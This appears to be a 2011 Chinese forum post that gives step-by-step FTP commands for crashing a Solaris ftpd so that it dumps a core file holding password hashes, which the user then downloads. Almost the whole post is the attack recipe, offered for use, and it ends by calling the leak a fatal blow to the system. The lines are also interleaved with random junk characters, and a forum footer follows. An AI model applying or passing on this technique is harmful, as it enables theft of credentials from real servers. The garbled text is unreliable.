該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG��,使得用戶可以獲得該機(jī)的口令文件���。具體過程如下:0 u0 n, |; O- |; F S d
7 I- h$ q+ `5 C/ F0 y" U) h
1.通過 ftp 正常登錄到目的主機(jī)上2 r" f) m4 ]3 ~! f/ y" [" ^; [/ C
2 X7 ]3 H7 J, x6 c7 W9 R" V3 c2.輸入如下命令序列:
7 [! u: p2 s q- @: v. @" [( o% }" @8 x: o
ftp> user root wrongpasswd" I( }# o. @( l. v& @- @( F5 I, V
4 y' c4 K/ K" I( V# L0 E7 z: s) o
ftp> quote pasv$ _' }! Z: V6 e8 W1 A9 C
( D' ?; \5 u7 h3 ]( I# m
3.這時��,ftpd會報錯退出��,同時會在當(dāng)前目錄下生成一個core��,口令文件就包含在這個core中��。- T' ^* @; W( {( B9 h* D
# I! W1 M' ~. T/ M, D$ @0 Q C4.再次進(jìn)入FTP >get core9 [7 s, S9 k0 w0 }: P7 i0 S
% h; Y5 \& \, O% a0 o% U
補充:雖然在core只有一部分shadow�,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
% I' G$ m' _( E/ G
; H0 D- n$ C5 I/ j" ?9 C0 b |
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港
( 魯ICP備19052200號-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡